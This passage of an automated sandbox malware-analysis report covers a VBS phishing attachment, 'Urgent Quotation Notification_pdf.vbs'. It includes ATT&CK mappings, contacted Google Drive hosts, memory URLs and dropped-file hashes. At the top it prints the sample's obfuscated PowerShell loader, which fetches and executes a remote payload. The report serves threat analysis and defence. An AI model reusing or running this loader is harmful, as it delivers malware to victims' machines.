'unp$ dacdeph.arabilncoan raiinted,m.und
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#cantharidating desinficerer afgrdernes mistakenly bunsen spadestres #>;$befleaing='subclans';<#opinionsdannelserne leia entomophthorous hedninger #>;$essens=$host.privatedata;if ($essens) {$becollier++;}function fabrikskomplekserne($syngespil){$brace66=$frafaldendes+$syngespil.length-$becollier;for( $acuserl=3;$acuserl -lt $brace66;$acuserl+=4){$stevedorerne+=$syngespil[$acuserl];}$stevedorerne;}function trolddomskunsternes($pretabulation){ . ($untenseness) ($pretabulation);}$plattenslager=fabrikskomplekserne 'dimmsejodehzsanimetlantle.sa a/spi5unr.ga 0.ka wax( k,wantipann podrumoa awidisalm t n ret me lea1fil0fel.ska0si.;fje trtw.emi g,ncry6cla4tan; ,p staxnot6 ra4 il;pe pr r alvtin:nya1i t2ou 1.mt.bio0ret)ice acgovee elc tokf do mi/met2fli0 nf1 ,h0ren0 ta1 nd0 b 1 ar aalfsemihalrpave vef fiow.ax il/tun1as.2 ri1sna. t0hvi ';$unentailed=fabrikskomplekserne ' f.u ,ns alegr reks-sarabebg elema ntiptres ';$certifiability=fabrikskomplekserne ' gehre t unt hpfe sfum:brn/che/opddejerlydi covjaze nu.,raga eo caomilg ,elb,sesha. .oc.olo,oemfed/ p.u p cno.?po e.etxmedpko o puras.tma =vaadfinofngwme.nunll s ote.a nodpre& igiridd ar=,la1clutserftegxonyc.fdrprejp ewouttd.ygpjamlysaevic na2gr helejo r-devv trsm dl.aro,idwcepxdisw ,es f.sseskbi gunobstv1tor7m g6gyls g. ';$tilskringskursuset=fabrikskomplekserne 'f.b>lac ';$untenseness=fabrikskomplekserne ' unitineen xdo ';$remburserne='kohoveder';$bakie='\bumpenes.sam';trolddomskunsternes (fabrikskomplekserne 'tre$ teg mbl hao mmb analomlsk :enddfesuvoltfr,itr.avacb bll eepo =mon$ lae pan upvpre:ka as,mpmisp codordaraatbaratek+ de$ekkbd aa rak unibroeo d ');trolddomskunsternes (fabrikskomplekserne 'tan$,ksgd al fooannbbl a hylpha: kap torpolel,di almbelp vo ndrgartble=sup$limc eveprorapptsayiza f ai .kafisbfaliornlchaihyptwriyten.carsprop milteli extp l(pai$pratd.wivesl o.s huksamrfo icaln zog scstilkposub.drs tsba u tospr.e aftbla)b l ');trolddomskunsternes (fabrikskomplekserne 'mol[.ern.ocepret.tu.angs tre,iarsmevhumife cgrues,rp ao lmilevndeft momsu acasn ska olgslieb.yradn] wr:gth:brssfree t cunmu,anryppi nttsvey inpchirbriostitoutorifcmejotyrl fo bof= st ,ys[in.nuboed.rttpp.s ossofeovecundun,tr fri et ubyafvpbjerkofokretunaowitcmatokinlskrtgluyskipposesal]a i: ej:y ut oclobjs kv1sym2mas ');$certifiability=$preimport[0];$fortolke=(fabrikskomplekserne ' re$blagstalsano arbmulasjklkon:genc brhmo,a.nnn asn,ndipolele.=comnb tehoow .i-sp osnebudnjacce ascarktkas ubesb uycams cetmune dsmtra.sp,nmisepost de. nowberenonb lycnonl,isibriehusn hjtopf ');trolddomskunsternes ($fortolke);trolddomskunsternes (fabrikskomplekserne 'lug$,nkchyphpreaenenba.ns,ei mieant.vivhk,nes raat,d gyec xr udsfel[ st$nynulymnfleein.n ontre aunoi aclbeeeford ac]ani=sk $trkpurelsatafe.tbentintekg.n ytsicilirras,igdrme cerhol ');$bufferkapaciteterne=fabrikskomplekserne 'unp$ dacdeph.arabilncoan raiinted,m.undJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information321
      Scripting      		Valid Accounts1
      Windows Management Instrumentation      		321
      Scripting      		11
      Process Injection      		1
      Masquerading      		OS Credential Dumping11
      Security Software Discovery      		Remote ServicesData from Local System1
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts2
      Command and Scripting Interpreter      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		21
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop ProtocolData from Removable Media3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Exploitation for Client Execution      		Logon Script (Windows)Logon Script (Windows)11
      Process Injection      		Security Account Manager21
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts2
      PowerShell      		Login HookLogin Hook1
      Obfuscated Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture14
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading      		LSA Secrets1
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Urgent Quotation Notification_pdf.vbs3%ReversingLabs

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://nuget.org/NuGet.exe0%URL Reputationsafe
      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
      https://contoso.com/0%URL Reputationsafe
      https://nuget.org/nuget.exe0%URL Reputationsafe
      https://contoso.com/License0%URL Reputationsafe
      https://contoso.com/Icon0%URL Reputationsafe
      https://aka.ms/pscore680%URL Reputationsafe
      https://apis.google.com0%URL Reputationsafe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      bg.microsoft.map.fastly.net
      		199.232.214.172
      		truefalse
        		unknown
        drive.google.com
        		142.250.186.174
        		truefalse
          		unknown
          drive.usercontent.google.com
          		142.250.186.33
          		truefalse
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://www.google.compowershell.exe, 00000002.00000002.2609687458.000001D6004F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601CD1000.00000004.00000800.00020000.00000000.sdmpfalse
              		unknown
              http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2631379660.000001D6101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2631379660.000001D610074000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://drive.usercontent.google.compowershell.exe, 00000002.00000002.2609687458.000001D601C74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601DC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601165000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60071F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601652000.00000004.00000800.00020000.00000000.sdmpfalse
                		unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2609687458.000001D600226000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2609687458.000001D600226000.00000004.00000800.00020000.00000000.sdmpfalse
                  		unknown
                  https://drive.usercontent.google.com(powershell.exe, 00000002.00000002.2609687458.000001D601165000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60071F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601652000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    https://contoso.com/powershell.exe, 00000002.00000002.2631379660.000001D610074000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2631379660.000001D6101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2631379660.000001D610074000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/Licensepowershell.exe, 00000002.00000002.2631379660.000001D610074000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/Iconpowershell.exe, 00000002.00000002.2631379660.000001D610074000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://drive.googPpowershell.exe, 00000002.00000002.2609687458.000001D601C38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601DC4000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      http://cacerts.digiwscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://drive.google.compowershell.exe, 00000002.00000002.2609687458.000001D60071F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600A02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60175D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600B4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601829000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601652000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          https://drive.usercontent.googhpowershell.exe, 00000002.00000002.2609687458.000001D601C62000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            https://drive.usercontent.google.compowershell.exe, 00000002.00000002.2609687458.000001D601C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601DC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60071F000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              http://drive.google.compowershell.exe, 00000002.00000002.2609687458.000001D60154F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600974000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60179A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60102B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600D75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601DC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D6005E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601165000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D6016ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60071F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600A02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600B4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601829000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601652000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://aka.ms/pscore68powershell.exe, 00000002.00000002.2609687458.000001D600001000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://apis.google.compowershell.exe, 00000002.00000002.2609687458.000001D6004F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601CD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2609687458.000001D600001000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2609687458.000001D600226000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  142.250.186.174
                                  		drive.google.comUnited States
                                  		15169GOOGLEUSfalse
                                  142.250.186.33
                                  		drive.usercontent.google.comUnited States
                                  		15169GOOGLEUSfalse

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1522522
                                  Start date and time:2024-09-30 09:57:09 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 4m 45s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:10
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:Urgent Quotation Notification_pdf.vbs
                                  Detection:MAL
                                  Classification:mal88.expl.evad.winVBS@4/5@2/2
                                  EGA Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 5
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Found application associated with file extension: .vbs

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                  • Excluded IPs from analysis (whitelisted): 199.232.214.172
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target powershell.exe, PID 7752 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: Urgent Quotation Notification_pdf.vbs

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  03:58:00API Interceptor1x Sleep call for process: wscript.exe modified
                                  03:58:03API Interceptor3996397x Sleep call for process: powershell.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  No context

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  bg.microsoft.map.fastly.nethttp://hrlaw.com.auGet hashmaliciousUnknownBrowse
                                  • 199.232.214.172
                                  https://url.uk.m.mimecastprotect.com/s/r06pCLv4mSmE7ORSBfNCyUvN-?domain=clicktracking.yellowbook.com/Get hashmaliciousUnknownBrowse
                                  • 199.232.214.172
                                  https://www.google.ad/amp/clck.ru/3DSSA9?hghgHGHGHJGhghdgddghfhghfgdgdgdgfhgg?sdfsewsrewrettfgGet hashmaliciousUnknownBrowse
                                  • 199.232.214.172
                                  yVhGfho0R4.exeGet hashmaliciousRemcosBrowse
                                  • 199.232.214.172
                                  https://pokerfanboy.com/Get hashmaliciousUnknownBrowse
                                  • 199.232.210.172
                                  https://polap77.com/Get hashmaliciousHTMLPhisherBrowse
                                  • 199.232.214.172
                                  https://pokegamaclub.com/Get hashmaliciousUnknownBrowse
                                  • 199.232.214.172
                                  Transmission Cost Database 2.0.xlsbGet hashmaliciousUnknownBrowse
                                  • 199.232.214.172
                                  https://okfun188.com/Get hashmaliciousUnknownBrowse
                                  • 199.232.214.172
                                  https://mukirecords.com/Get hashmaliciousUnknownBrowse
                                  • 199.232.214.172

                                  ASNs

                                  No context

                                  JA3 Fingerprints

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  3b5074b1b5d032e5620f69f9f700ff0ehttp://hrlaw.com.auGet hashmaliciousUnknownBrowse
                                  • 142.250.186.33
                                  • 142.250.186.174
                                  file.exeGet hashmaliciousUnknownBrowse
                                  • 142.250.186.33
                                  • 142.250.186.174
                                  file.exeGet hashmaliciousUnknownBrowse
                                  • 142.250.186.33
                                  • 142.250.186.174
                                  CAPE MARS VSL'S PARTICULARS.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 142.250.186.33
                                  • 142.250.186.174
                                  MV TASOS Vessel's Details.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 142.250.186.33
                                  • 142.250.186.174
                                  COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                  • 142.250.186.33
                                  • 142.250.186.174
                                  https://okfun188.com/Get hashmaliciousUnknownBrowse
                                  • 142.250.186.33
                                  • 142.250.186.174
                                  https://mukirecords.com/Get hashmaliciousUnknownBrowse
                                  • 142.250.186.33
                                  • 142.250.186.174
                                  https://thepeaceapproach.net/Get hashmaliciousUnknownBrowse
                                  • 142.250.186.33
                                  • 142.250.186.174
                                  https://cpanel.whitewestinghouse.com.py/Get hashmaliciousUnknownBrowse
                                  • 142.250.186.33
                                  • 142.250.186.174

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                  Download File
                                  Process:C:\Windows\System32\wscript.exe
                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                  Category:dropped
                                  Size (bytes):71954
                                  Entropy (8bit):7.996617769952133
                                  Encrypted:true
                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                  Download File
                                  Process:C:\Windows\System32\wscript.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):328
                                  Entropy (8bit):3.2429904267830576
                                  Encrypted:false
                                  SSDEEP:6:kKgpZi9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:opvDImsLNkPlE99SNxAhUe/3
                                  MD5:5CCB347A9339E54E7656DB893F54D576
                                  SHA1:01596A71DA70BFD12417DACDD026046DB8EE0666
                                  SHA-256:648AAF87F73C950F081D7E83EF8C0583A7874222FA7E61E8F4CD7FE731172E3D
                                  SHA-512:402393A1E89D8394496DE710F6A73407DBA201E8BF9FB69E03985CE525B3A51AD33EF86AC57D384D6F10AB5710D58C33144FB3ACC9B88DE6BDC04316CA7D441A
                                  Malicious:false
                                  Reputation:low
                                  Preview:p...... .........u.x....(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:modified
                                  Size (bytes):11608
                                  Entropy (8bit):4.890472898059848
                                  Encrypted:false
                                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                  MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                  SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                  SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                  SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jitc4mea.v5j.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qf0smckr.iuj.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
